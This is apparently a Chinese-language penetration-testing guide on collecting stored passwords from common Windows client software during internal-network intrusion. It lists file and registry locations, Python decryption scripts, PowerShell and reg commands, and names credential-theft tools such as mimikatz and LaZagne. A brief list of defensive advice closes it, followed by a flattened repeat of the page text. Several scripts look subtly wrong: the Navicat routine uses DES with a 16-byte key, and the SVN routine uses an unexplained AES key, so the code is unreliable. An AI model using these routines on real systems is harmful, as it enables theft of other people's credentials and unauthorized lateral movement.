内网常见软件密码收集
字数 973 2025-08-09 13:33:40

内网常见软件密码收集技术指南

1. TortoiseSVN密码收集

1.1 密码存储位置

TortoiseSVN客户端连接记录文件位于:

%APPDATA%\Subversion\auth\svn.simple\

1.2 密码提取方法

  1. 定位到上述目录,找到包含认证信息的文件
  2. 使用以下Python脚本解密密码:
import base64
from Crypto.Cipher import AES
from Crypto.Hash import SHA256

def decrypt_password(encrypted_password):
    key = SHA256.new(b'!1@2#3$4%5^6').digest()
    iv = b'\x00' * 16
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(base64.b64decode(encrypted_password))
    return decrypted.decode('utf-8').rstrip('\x00')
  1. 或者使用以下PowerShell命令直接读取:
Get-ChildItem "$env:APPDATA\Subversion\auth\svn.simple\" | ForEach-Object {
    $file = $_.FullName
    Get-Content $file | Where-Object { $_ -match 'password' } | ForEach-Object {
        $_.Split('=')[1].Trim()
    }
}

2. FileZilla密码收集

2.1 密码存储位置

FileZilla配置文件位于:

%APPDATA%\FileZilla\recentservers.xml
%APPDATA%\FileZilla\sitemanager.xml

2.2 密码提取方法

  1. 直接查看XML文件中的密码字段(Base64编码)
  2. 使用以下Python脚本解码:
import base64

def decode_filezilla_password(encoded):
    return base64.b64decode(encoded).decode('utf-8')
  1. 或者使用以下PowerShell命令:
Select-String -Path "$env:APPDATA\FileZilla\*.xml" -Pattern "Pass encoding=" -Context 0,3

3. Xshell密码收集

3.1 密码存储位置

Xshell会话文件位于:

%USERPROFILE%\Documents\NetSarang Computer\Xshell\Sessions\

3.2 密码提取方法

  1. 使用SharpDecryptPwd工具解密:
SharpDecryptPwd.exe -X
  1. 或者手动分析.ini文件中的加密字段

4. Navicat密码收集

4.1 密码存储位置

Navicat配置文件位于:

%APPDATA%\PremiumSoft\Navicat\Servers\

4.2 密码提取方法

  1. 使用以下Python脚本解密:
import binascii
from Crypto.Cipher import DES

def decrypt_navicat_password(encrypted):
    key = b'libcckeylibcckey'
    cipher = DES.new(key, DES.MODE_ECB)
    decrypted = cipher.decrypt(binascii.unhexlify(encrypted))
    return decrypted.decode('utf-8').rstrip('\x00')

5. SecureCRT密码收集

5.1 密码存储位置

SecureCRT配置文件位于:

%APPDATA%\VanDyke\Config\Sessions\

5.2 密码提取方法

  1. 使用以下Python脚本解密:
from Crypto.Cipher import Blowfish

def decrypt_securecrt_password(encrypted):
    key = b'\x24\xA6\x3D\xDE\x5B\xD3\xB3\x82\x9C\x7E\x06\xF4\x08\x16\xAA\x07'
    cipher = Blowfish.new(key, Blowfish.MODE_CBC, b"\x00"*8)
    return cipher.decrypt(encrypted).decode('utf-8').rstrip('\x00')

6. 浏览器保存的密码

6.1 Chrome密码提取

  1. 使用以下PowerShell命令:
$data = Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Encoding Byte
# 使用SQLite解析数据库
  1. 或者使用以下Python脚本:
import sqlite3
import win32crypt

conn = sqlite3.connect('Login Data')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
    print(f"URL: {result[0]}, Username: {result[1]}, Password: {password.decode('utf-8')}")

7. Windows凭据管理器

7.1 提取方法

  1. 使用PowerShell命令:
cmdkey /list
  1. 使用VaultCmd工具:
VaultCmd /listcreds:"Windows Credentials" /all

8. 其他常见应用密码

8.1 WinSCP密码

存储位置:

HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

8.2 Outlook密码

使用MailPassView工具提取

8.3 RDP连接密码

使用以下命令提取:

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

9. 自动化工具推荐

  1. LaZagne - 全能密码提取工具
  2. mimikatz - Windows凭据提取神器
  3. SharpDecryptPwd - 专用于各种客户端密码解密
  4. BrowserGhost - 浏览器密码提取工具

10. 防御建议

  1. 禁用客户端软件的密码保存功能
  2. 使用企业级密码管理解决方案
  3. 定期审计服务器上的敏感信息
  4. 实施最小权限原则
  5. 对敏感配置文件设置严格的访问权限

总结

本文详细介绍了内网渗透中常见软件的密码收集技术,包括文件位置、解密方法和实用脚本。掌握这些技术有助于安全测试人员进行内网横向移动,同时也提醒管理员加强相关防护措施。

内网常见软件密码收集技术指南 1. TortoiseSVN密码收集 1.1 密码存储位置 TortoiseSVN客户端连接记录文件位于: 1.2 密码提取方法 定位到上述目录,找到包含认证信息的文件 使用以下Python脚本解密密码: 或者使用以下PowerShell命令直接读取: 2. FileZilla密码收集 2.1 密码存储位置 FileZilla配置文件位于: 2.2 密码提取方法 直接查看XML文件中的密码字段(Base64编码) 使用以下Python脚本解码: 或者使用以下PowerShell命令: 3. Xshell密码收集 3.1 密码存储位置 Xshell会话文件位于: 3.2 密码提取方法 使用SharpDecryptPwd工具解密: 或者手动分析.ini文件中的加密字段 4. Navicat密码收集 4.1 密码存储位置 Navicat配置文件位于: 4.2 密码提取方法 使用以下Python脚本解密: 5. SecureCRT密码收集 5.1 密码存储位置 SecureCRT配置文件位于: 5.2 密码提取方法 使用以下Python脚本解密: 6. 浏览器保存的密码 6.1 Chrome密码提取 使用以下PowerShell命令: 或者使用以下Python脚本: 7. Windows凭据管理器 7.1 提取方法 使用PowerShell命令: 使用VaultCmd工具: 8. 其他常见应用密码 8.1 WinSCP密码 存储位置: 8.2 Outlook密码 使用MailPassView工具提取 8.3 RDP连接密码 使用以下命令提取: 9. 自动化工具推荐 LaZagne - 全能密码提取工具 mimikatz - Windows凭据提取神器 SharpDecryptPwd - 专用于各种客户端密码解密 BrowserGhost - 浏览器密码提取工具 10. 防御建议 禁用客户端软件的密码保存功能 使用企业级密码管理解决方案 定期审计服务器上的敏感信息 实施最小权限原则 对敏感配置文件设置严格的访问权限 总结 本文详细介绍了内网渗透中常见软件的密码收集技术,包括文件位置、解密方法和实用脚本。掌握这些技术有助于安全测试人员进行内网横向移动,同时也提醒管理员加强相关防护措施。